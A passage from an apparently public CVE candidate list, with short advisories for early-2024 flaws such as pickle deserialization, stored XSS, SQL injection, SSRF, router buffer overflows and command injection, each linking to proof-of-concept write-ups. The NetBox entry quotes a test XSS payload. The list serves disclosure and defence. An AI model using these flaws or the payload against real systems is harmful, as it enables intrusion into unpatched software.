URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/6f7c164f-2f78-4857-94b9-077c2dea13df?source=cve Assigned (20240126)
CVE 2024 960 Candidate A vulnerability was found in flink-extended ai-flow 0.3.1. It has been declared as critical. Affected by this vulnerability is the function cloudpickle.loads of the file \ai_flow\cli\commands\workflow_command.py. The manipulation leads to deserialization. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-252205 was assigned to this vulnerability. MISC:https://github.com/bayuncao/vul-cve-8 | URL:https://github.com/bayuncao/vul-cve-8 | MISC:https://github.com/bayuncao/vul-cve-8/blob/main/dataset.pkl | URL:https://github.com/bayuncao/vul-cve-8/blob/main/dataset.pkl | MISC:https://vuldb.com/?ctiid.252205 | URL:https://vuldb.com/?ctiid.252205 | MISC:https://vuldb.com/?id.252205 | URL:https://vuldb.com/?id.252205 Assigned (20240126)
CVE 2024 959 Candidate A vulnerability was found in StanfordVL GibsonEnv 0.3.1. It has been classified as critical. Affected is the function cloudpickle.load of the file gibson\utils\pposgd_fuse.py. The manipulation leads to deserialization. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252204. MISC:https://github.com/bayuncao/vul-cve-7 | URL:https://github.com/bayuncao/vul-cve-7 | MISC:https://github.com/bayuncao/vul-cve-7/blob/main/dataset.pkl | URL:https://github.com/bayuncao/vul-cve-7/blob/main/dataset.pkl | MISC:https://vuldb.com/?ctiid.252204 | URL:https://vuldb.com/?ctiid.252204 | MISC:https://vuldb.com/?id.252204 | URL:https://vuldb.com/?id.252204 Assigned (20240126)
CVE 2024 958 Candidate A vulnerability was found in CodeAstro Stock Management System 1.0 and classified as problematic. This issue affects some unknown processing of the file /index.php of the component Add Category Handler. The manipulation of the argument Category Name/Category Description leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252203. MISC:https://drive.google.com/drive/folders/17JTwjuT09q7he_oXkMtZS5jyyXw8ZIgg?usp=sharing | URL:https://drive.google.com/drive/folders/17JTwjuT09q7he_oXkMtZS5jyyXw8ZIgg?usp=sharing | MISC:https://vuldb.com/?ctiid.252203 | URL:https://vuldb.com/?ctiid.252203 | MISC:https://vuldb.com/?id.252203 | URL:https://vuldb.com/?id.252203 Assigned (20240126)
CVE 2024 957 Candidate The WooCommerce PDF Invoices, Packing Slips, Delivery Notes and Shipping Labels plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Customer Notes field in all versions up to, and including, 4.4.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected invoice for printing. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3050923%40print-invoices-packing-slip-labels-for-woocommerce&new=3050923%40print-invoices-packing-slip-labels-for-woocommerce&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3050923%40print-invoices-packing-slip-labels-for-woocommerce&new=3050923%40print-invoices-packing-slip-labels-for-woocommerce&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/c7ba4218-5b60-4e72-b98d-7c95c9fc3d59?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/c7ba4218-5b60-4e72-b98d-7c95c9fc3d59?source=cve Assigned (20240126)
CVE 2024 955 Candidate A stored XSS vulnerability exists where an authenticated, remote attacker with administrator privileges on the Nessus application could alter Nessus proxy settings, which could lead to the execution of remote arbitrary scripts. MISC:https://www.tenable.com/security/tns-2024-01 | URL:https://www.tenable.com/security/tns-2024-01 Assigned (20240126)
CVE 2024 954 Candidate The Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting through editing context via the 'data-eael-wrapper-link' wrapper in all versions up to, and including, 5.9.7 due to insufficient input sanitization and output escaping on user supplied protocols. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset/3029928/essential-addons-for-elementor-lite/tags/5.9.8/assets/front-end/js/view/wrapper-link.js | URL:https://plugins.trac.wordpress.org/changeset/3029928/essential-addons-for-elementor-lite/tags/5.9.8/assets/front-end/js/view/wrapper-link.js | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/875db71d-c799-40b9-95e1-74d53046b0a9?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/875db71d-c799-40b9-95e1-74d53046b0a9?source=cve Assigned (20240126)
CVE 2024 953 Candidate When a user scans a QR Code with the QR Code Scanner feature, the user is not prompted before being navigated to the page specified in the code. This may surprise the user and potentially direct them to unwanted content. MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1837916 | URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1837916 Assigned (20240126)
CVE 2024 951 Candidate The Advanced Social Feeds Widget & Shortcode WordPress plugin through 1.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup) MISC:https://wpscan.com/vulnerability/88b2e479-eb15-4213-9df8-3d353074974e/ | URL:https://wpscan.com/vulnerability/88b2e479-eb15-4213-9df8-3d353074974e/ Assigned (20240126)
CVE 2024 948 Candidate A vulnerability, which was classified as problematic, has been found in NetBox up to 3.7.0. This issue affects some unknown processing of the file /core/config-revisions of the component Home Page Configuration. The manipulation with the input <<h1 onload=alert(1)>>test</h1> leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252191. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://drive.google.com/file/d/1tcgyzu9Fh3AMG0INR0EdOR7ZjWmBK0ZR/view?usp=sharing | URL:https://drive.google.com/file/d/1tcgyzu9Fh3AMG0INR0EdOR7ZjWmBK0ZR/view?usp=sharing | MISC:https://vuldb.com/?ctiid.252191 | URL:https://vuldb.com/?ctiid.252191 | MISC:https://vuldb.com/?id.252191 | URL:https://vuldb.com/?id.252191 Assigned (20240126)
CVE 2024 946 Candidate A vulnerability classified as critical was found in 60IndexPage up to 1.8.5. This vulnerability affects unknown code of the file /apply/index.php of the component Parameter Handler. The manipulation of the argument url leads to server-side request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-252190 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://note.zhaoj.in/share/iNSyaClT0hGi | URL:https://note.zhaoj.in/share/iNSyaClT0hGi | MISC:https://vuldb.com/?ctiid.252190 | URL:https://vuldb.com/?ctiid.252190 | MISC:https://vuldb.com/?id.252190 | URL:https://vuldb.com/?id.252190 Assigned (20240126)
CVE 2024 945 Candidate A vulnerability classified as critical has been found in 60IndexPage up to 1.8.5. This affects an unknown part of the file /include/file.php of the component Parameter Handler. The manipulation of the argument url leads to server-side request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252189 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://note.zhaoj.in/share/7F54gy22y7uJ | URL:https://note.zhaoj.in/share/7F54gy22y7uJ | MISC:https://vuldb.com/?ctiid.252189 | URL:https://vuldb.com/?ctiid.252189 | MISC:https://vuldb.com/?id.252189 | URL:https://vuldb.com/?id.252189 Assigned (20240126)
CVE 2024 944 Candidate A vulnerability was found in Totolink T8 4.1.5cu.833_20220905. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /cgi-bin/cstecgi.cgi. The manipulation leads to session expiration. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252188. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://drive.google.com/file/d/1YPisSnxM5CwSLKFgs9w5k5MtNUgiijVo/view?usp=sharing | URL:https://drive.google.com/file/d/1YPisSnxM5CwSLKFgs9w5k5MtNUgiijVo/view?usp=sharing | MISC:https://vuldb.com/?ctiid.252188 | URL:https://vuldb.com/?ctiid.252188 | MISC:https://vuldb.com/?id.252188 | URL:https://vuldb.com/?id.252188 Assigned (20240126)
CVE 2024 943 Candidate A vulnerability was found in Totolink N350RT 9.3.5u.6255. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /cgi-bin/cstecgi.cgi. The manipulation leads to session expiration. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252187. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://drive.google.com/file/d/1OBs4kc1KvbqrMhQHs54WtwxxxiBoI0hL/view?usp=sharing | URL:https://drive.google.com/file/d/1OBs4kc1KvbqrMhQHs54WtwxxxiBoI0hL/view?usp=sharing | MISC:https://vuldb.com/?ctiid.252187 | URL:https://vuldb.com/?ctiid.252187 | MISC:https://vuldb.com/?id.252187 | URL:https://vuldb.com/?id.252187 Assigned (20240126)
CVE 2024 942 Candidate A vulnerability was found in Totolink N200RE V5 9.3.5u.6255_B20211224. It has been classified as problematic. Affected is an unknown function of the file /cgi-bin/cstecgi.cgi. The manipulation leads to session expiration. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. VDB-252186 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://drive.google.com/file/d/1oWAGbmDtHDIUN1WSRAh4ZnuzHOuvTU4T/view?usp=sharing | URL:https://drive.google.com/file/d/1oWAGbmDtHDIUN1WSRAh4ZnuzHOuvTU4T/view?usp=sharing | MISC:https://vuldb.com/?ctiid.252186 | URL:https://vuldb.com/?ctiid.252186 | MISC:https://vuldb.com/?id.252186 | URL:https://vuldb.com/?id.252186 | MISC:https://youtu.be/b0tU2CiLbnU | URL:https://youtu.be/b0tU2CiLbnU Assigned (20240126)
CVE 2024 941 Candidate A vulnerability was found in Novel-Plus 4.3.0-RC1 and classified as critical. This issue affects some unknown processing of the file /novel/bookComment/list. The manipulation of the argument sort leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-252185 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/red0-ha1yu/warehouse/blob/main/novel-plus_sqlinject2.md | URL:https://github.com/red0-ha1yu/warehouse/blob/main/novel-plus_sqlinject2.md | MISC:https://vuldb.com/?ctiid.252185 | URL:https://vuldb.com/?ctiid.252185 | MISC:https://vuldb.com/?id.252185 | URL:https://vuldb.com/?id.252185 Assigned (20240126)
CVE 2024 939 Candidate A vulnerability has been found in Beijing Baichuo Smart S210 Management Platform up to 20240117 and classified as critical. This vulnerability affects unknown code of the file /Tool/uploadfile.php. The manipulation of the argument file_upload leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252184. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/Yu1e/vuls/blob/main/an%20arbitrary%20file%20upload%20vulnerability%20in%20BaiZhuo%20Networks%20Smart%20S210%20multi-service%20security%20gateway%20intelligent%20management%20platform.md | URL:https://github.com/Yu1e/vuls/blob/main/an%20arbitrary%20file%20upload%20vulnerability%20in%20BaiZhuo%20Networks%20Smart%20S210%20multi-service%20security%20gateway%20intelligent%20management%20platform.md | MISC:https://vuldb.com/?ctiid.252184 | URL:https://vuldb.com/?ctiid.252184 | MISC:https://vuldb.com/?id.252184 | URL:https://vuldb.com/?id.252184 Assigned (20240126)
CVE 2024 938 Candidate A vulnerability, which was classified as critical, was found in Tongda OA 2017 up to 11.9. This affects an unknown part of the file /general/email/inbox/delete_webmail.php. The manipulation of the argument WEBBODY_ID_STR leads to sql injection. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-252183. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/Yu1e/vuls/blob/main/SQL%20injection%20vulnerability%20exists%20in%20Tongda%20OA.md | URL:https://github.com/Yu1e/vuls/blob/main/SQL%20injection%20vulnerability%20exists%20in%20Tongda%20OA.md | MISC:https://vuldb.com/?ctiid.252183 | URL:https://vuldb.com/?ctiid.252183 | MISC:https://vuldb.com/?id.252183 | URL:https://vuldb.com/?id.252183 Assigned (20240126)
CVE 2024 937 Candidate A vulnerability, which was classified as critical, has been found in van_der_Schaar LAB synthcity 0.2.9. Affected by this issue is the function load_from_file of the component PKL File Handler. The manipulation leads to deserialization. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252182 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early and confirmed immediately the existence of the issue. A patch is planned to be released in February 2024. MISC:https://github.com/bayuncao/vul-cve-6 | URL:https://github.com/bayuncao/vul-cve-6 | MISC:https://github.com/bayuncao/vul-cve-6/blob/main/poc.py | URL:https://github.com/bayuncao/vul-cve-6/blob/main/poc.py | MISC:https://vuldb.com/?ctiid.252182 | URL:https://vuldb.com/?ctiid.252182 | MISC:https://vuldb.com/?id.252182 | URL:https://vuldb.com/?id.252182 Assigned (20240126)
CVE 2024 936 Candidate A vulnerability classified as critical was found in van_der_Schaar LAB TemporAI 0.0.3. Affected by this vulnerability is the function load_from_file of the component PKL File Handler. The manipulation leads to deserialization. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252181 was assigned to this vulnerability. NOTE: The vendor was contacted early and confirmed immediately the existence of the issue. A patch is planned to be released in February 2024. MISC:https://github.com/bayuncao/vul-cve-5 | URL:https://github.com/bayuncao/vul-cve-5 | MISC:https://github.com/bayuncao/vul-cve-5/blob/main/poc.py | URL:https://github.com/bayuncao/vul-cve-5/blob/main/poc.py | MISC:https://vuldb.com/?ctiid.252181 | URL:https://vuldb.com/?ctiid.252181 | MISC:https://vuldb.com/?id.252181 | URL:https://vuldb.com/?id.252181 Assigned (20240126)
CVE 2024 935 Candidate Insertion of Sensitive Information into Log File vulnerabilities are affecting DELMIA Apriso Release 2019 through Release 2024 MISC:https://www.3ds.com/vulnerability/advisories | URL:https://www.3ds.com/vulnerability/advisories Assigned (20240126)
CVE 2024 933 Candidate A vulnerability was found in Niushop B2B2C V5 and classified as critical. Affected by this issue is some unknown functionality of the file \app\model\Upload.php. The manipulation leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252140. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://docs.qq.com/doc/DYnNWeHdTVXZqZURH | URL:https://docs.qq.com/doc/DYnNWeHdTVXZqZURH | MISC:https://vuldb.com/?ctiid.252140 | URL:https://vuldb.com/?ctiid.252140 | MISC:https://vuldb.com/?id.252140 | URL:https://vuldb.com/?id.252140 Assigned (20240126)
CVE 2024 932 Candidate A vulnerability, which was classified as critical, has been found in Tenda AC10U 15.03.06.49_multi_TDE01. This issue affects the function setSmartPowerManagement. The manipulation of the argument time leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252137 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/setSmartPowerManagement.md | URL:https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/setSmartPowerManagement.md | MISC:https://vuldb.com/?ctiid.252137 | URL:https://vuldb.com/?ctiid.252137 | MISC:https://vuldb.com/?id.252137 | URL:https://vuldb.com/?id.252137 Assigned (20240126)
CVE 2024 931 Candidate A vulnerability classified as critical was found in Tenda AC10U 15.03.06.49_multi_TDE01. This vulnerability affects the function saveParentControlInfo. The manipulation of the argument deviceId/time/urls leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252136. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/saveParentControlInfo_1.md | URL:https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/saveParentControlInfo_1.md | MISC:https://vuldb.com/?ctiid.252136 | URL:https://vuldb.com/?ctiid.252136 | MISC:https://vuldb.com/?id.252136 | URL:https://vuldb.com/?id.252136 Assigned (20240126)
CVE 2024 930 Candidate A vulnerability classified as critical has been found in Tenda AC10U 15.03.06.49_multi_TDE01. This affects the function fromSetWirelessRepeat. The manipulation of the argument wpapsk_crypto leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252135. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/fromSetWirelessRepeat.md | URL:https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/fromSetWirelessRepeat.md | MISC:https://vuldb.com/?ctiid.252135 | URL:https://vuldb.com/?ctiid.252135 | MISC:https://vuldb.com/?id.252135 | URL:https://vuldb.com/?id.252135 Assigned (20240126)
CVE 2024 929 Candidate A vulnerability was found in Tenda AC10U 15.03.06.49_multi_TDE01. It has been rated as critical. Affected by this issue is the function fromNatStaticSetting. The manipulation of the argument page leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252134 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/fromNatStaticSetting.md | URL:https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/fromNatStaticSetting.md | MISC:https://vuldb.com/?ctiid.252134 | URL:https://vuldb.com/?ctiid.252134 | MISC:https://vuldb.com/?id.252134 | URL:https://vuldb.com/?id.252134 Assigned (20240126)
CVE 2024 928 Candidate A vulnerability was found in Tenda AC10U 15.03.06.49_multi_TDE01. It has been declared as critical. Affected by this vulnerability is the function fromDhcpListClient. The manipulation of the argument page/listN leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252133 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/fromDhcpListClient_1.md | URL:https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/fromDhcpListClient_1.md | MISC:https://vuldb.com/?ctiid.252133 | URL:https://vuldb.com/?ctiid.252133 | MISC:https://vuldb.com/?id.252133 | URL:https://vuldb.com/?id.252133 Assigned (20240126)
CVE 2024 927 Candidate A vulnerability was found in Tenda AC10U 15.03.06.49_multi_TDE01. It has been classified as critical. Affected is the function fromAddressNat. The manipulation of the argument entrys/mitInterface/page leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252132. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/fromAddressNat_1.md | URL:https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/fromAddressNat_1.md | MISC:https://vuldb.com/?ctiid.252132 | URL:https://vuldb.com/?ctiid.252132 | MISC:https://vuldb.com/?id.252132 | URL:https://vuldb.com/?id.252132 Assigned (20240126)
CVE 2024 926 Candidate A vulnerability was found in Tenda AC10U 15.03.06.49_multi_TDE01 and classified as critical. This issue affects the function formWifiWpsOOB. The manipulation of the argument index leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252131. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/formWifiWpsOOB.md | URL:https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/formWifiWpsOOB.md | MISC:https://vuldb.com/?ctiid.252131 | URL:https://vuldb.com/?ctiid.252131 | MISC:https://vuldb.com/?id.252131 | URL:https://vuldb.com/?id.252131 Assigned (20240126)
CVE 2024 925 Candidate A vulnerability has been found in Tenda AC10U 15.03.06.49_multi_TDE01 and classified as critical. This vulnerability affects the function formSetVirtualSer. The manipulation of the argument list leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-252130 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/formSetVirtualSer.md | URL:https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/formSetVirtualSer.md | MISC:https://vuldb.com/?ctiid.252130 | URL:https://vuldb.com/?ctiid.252130 | MISC:https://vuldb.com/?id.252130 | URL:https://vuldb.com/?id.252130 Assigned (20240126)
CVE 2024 924 Candidate A vulnerability, which was classified as critical, was found in Tenda AC10U 15.03.06.49_multi_TDE01. This affects the function formSetPPTPServer. The manipulation of the argument startIp leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252129 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/formSetPPTPServer.md | URL:https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/formSetPPTPServer.md | MISC:https://vuldb.com/?ctiid.252129 | URL:https://vuldb.com/?ctiid.252129 | MISC:https://vuldb.com/?id.252129 | URL:https://vuldb.com/?id.252129 Assigned (20240126)
CVE 2024 923 Candidate A vulnerability, which was classified as critical, has been found in Tenda AC10U 15.03.06.49_multi_TDE01. Affected by this issue is the function formSetDeviceName. The manipulation of the argument devName leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252128. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/formSetDeviceName.md | URL:https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/formSetDeviceName.md | MISC:https://vuldb.com/?ctiid.252128 | URL:https://vuldb.com/?ctiid.252128 | MISC:https://vuldb.com/?id.252128 | URL:https://vuldb.com/?id.252128 Assigned (20240126)
CVE 2024 922 Candidate A vulnerability classified as critical was found in Tenda AC10U 15.03.06.49_multi_TDE01. Affected by this vulnerability is the function formQuickIndex. The manipulation of the argument PPPOEPassword leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252127. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/formQuickIndex.md | URL:https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/formQuickIndex.md | MISC:https://vuldb.com/?ctiid.252127 | URL:https://vuldb.com/?ctiid.252127 | MISC:https://vuldb.com/?id.252127 | URL:https://vuldb.com/?id.252127 Assigned (20240126)
CVE 2024 921 Candidate A vulnerability has been found in D-Link DIR-816 A2 1.10CNB04 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /goform/setDeviceSettings of the component Web Interface. The manipulation of the argument statuscheckpppoeuser leads to os command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252139. MISC:https://github.com/xiyuanhuaigu/cve/blob/main/rce.md | URL:https://github.com/xiyuanhuaigu/cve/blob/main/rce.md | MISC:https://vuldb.com/?ctiid.252139 | URL:https://vuldb.com/?ctiid.252139 | MISC:https://vuldb.com/?id.252139 | URL:https://vuldb.com/?id.252139 Assigned (20240126)
CVE 2024 920 Candidate A vulnerability was found in TRENDnet TEW-822DRE 1.03B02. It has been declared as critical. This vulnerability affects unknown code of the file /admin_ping.htm of the component POST Request Handler. The manipulation of the argument ipv4_ping/ipv6_ping leads to command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252124. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://vuldb.com/?ctiid.252124 | URL:https://vuldb.com/?ctiid.252124 | MISC:https://vuldb.com/?id.252124 | URL:https://vuldb.com/?id.252124 | MISC:https://warp-desk-89d.notion.site/TEW-822DRE-5289eb95796749c2878843519ab451d8?pvs=4 | URL:https://warp-desk-89d.notion.site/TEW-822DRE-5289eb95796749c2878843519ab451d8?pvs=4 Assigned (20240126)
CVE 2024 919 Candidate A vulnerability was found in TRENDnet TEW-815DAP 1.0.2.0. It has been classified as critical. This affects the function do_setNTP of the component POST Request Handler. The manipulation of the argument NtpDstStart/NtpDstEnd leads to command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252123. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://vuldb.com/?ctiid.252123 | URL:https://vuldb.com/?ctiid.252123 | MISC:https://vuldb.com/?id.252123 | URL:https://vuldb.com/?id.252123 | MISC:https://warp-desk-89d.notion.site/TEW-815DAP-94a631c20dee4f399268dbcc880f1f4c?pvs=4 | URL:https://warp-desk-89d.notion.site/TEW-815DAP-94a631c20dee4f399268dbcc880f1f4c?pvs=4 Assigned (20240126)
CVE 2024 918 Candidate A vulnerability was found in TRENDnet TEW-800MB 1.0.1.0 and classified as critical. Affected by this issue is some unknown functionality of the component POST Request Handler. The manipulation of the argument DeviceURL leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252122 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://vuldb.com/?ctiid.252122 | URL:https://vuldb.com/?ctiid.252122 | MISC:https://vuldb.com/?id.252122 | URL:https://vuldb.com/?id.252122 | MISC:https://warp-desk-89d.notion.site/TEW-800MB-1f9576ce12234b72b08b9c7f4c7d32a6?pvs=4 | URL:https://warp-desk-89d.notion.site/TEW-800MB-1f9576ce12234b72b08b9c7f4c7d32a6?pvs=4 Assigned (20240126)
CVE 2024 917 Candidate remote code execution in paddlepaddle/paddle 2.6.0 MISC:https://huntr.com/bounties/2d840735-e255-4700-9709-6f7361829119 | URL:https://huntr.com/bounties/2d840735-e255-4700-9709-6f7361829119 Assigned (20240126)
CVE 2024 914 Candidate A timing side-channel vulnerability has been discovered in the opencryptoki package while processing RSA PKCS#1 v1.5 padded ciphertexts. This flaw could potentially enable unauthorized RSA ciphertext decryption or signing, even without access to the corresponding private key. MISC:RHBZ#2260407 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2260407 | MISC:RHSA-2024:1239 | URL:https://access.redhat.com/errata/RHSA-2024:1239 | MISC:RHSA-2024:1411 | URL:https://access.redhat.com/errata/RHSA-2024:1411 | MISC:https://access.redhat.com/security/cve/CVE-2024-0914 | URL:https://access.redhat.com/security/cve/CVE-2024-0914 | MISC:https://people.redhat.com/~hkario/marvin/ | URL:https://people.redhat.com/~hkario/marvin/ Assigned (20240125)
CVE 2024 911 Candidate A flaw was found in indent, a program for formatting C code. This issue may allow an attacker to trick a user into processing a specially crafted file to trigger a heap-based buffer overflow, causing the application to crash. MISC:RHBZ#2260399 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2260399 | MISC:https://access.redhat.com/security/cve/CVE-2024-0911 | URL:https://access.redhat.com/security/cve/CVE-2024-0911 | MISC:https://lists.gnu.org/archive/html/bug-indent/2024-01/msg00000.html | URL:https://lists.gnu.org/archive/html/bug-indent/2024-01/msg00000.html Assigned (20240125)
CVE 2024 909 Candidate The Anonymous Restricted Content plugin for WordPress is vulnerable to information disclosure in all versions up to, and including, 1.6.2. This is due to insufficient restrictions through the REST API on the posts/pages that protections are being place on. This makes it possible for unauthenticated attackers to access protected content. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030199%40anonymous-restricted-content&new=3030199%40anonymous-restricted-content&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030199%40anonymous-restricted-content&new=3030199%40anonymous-restricted-content&sfp_email=&sfph_mail= | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030608%40anonymous-restricted-content&new=3030608%40anonymous-restricted-content&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030608%40anonymous-restricted-content&new=3030608%40anonymous-restricted-content&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/f478ff7c-7193-4c59-a84f-c7cafff9b6c0?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/f478ff7c-7193-4c59-a84f-c7cafff9b6c0?source=cve Assigned (20240125)
